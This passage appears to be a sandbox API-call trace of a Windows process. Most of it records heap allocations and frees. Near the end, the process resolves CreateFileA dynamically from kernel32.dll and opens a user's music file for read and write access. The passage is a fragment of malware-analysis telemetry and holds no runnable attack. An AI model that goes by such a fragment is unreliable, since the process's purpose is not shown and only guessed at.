hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0038.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.990] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.993] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889430 [0038.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889430, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.993] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889430 [0038.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889430, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.994] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0038.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3f) returned 0x7ab260 [0038.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a", cchWideChar=63, lpMultiByteStr=0x7ab260, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a", lpUsedDefaultChar=0x0) returned 63 [0038.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.995] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\gr_-.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7e) returned 0x7d5b30 [0038.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=63, lpWideCharStr=0x7d5b30, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a") returned 63 [0038.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0038.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0038.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0038.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0038.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.997] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: 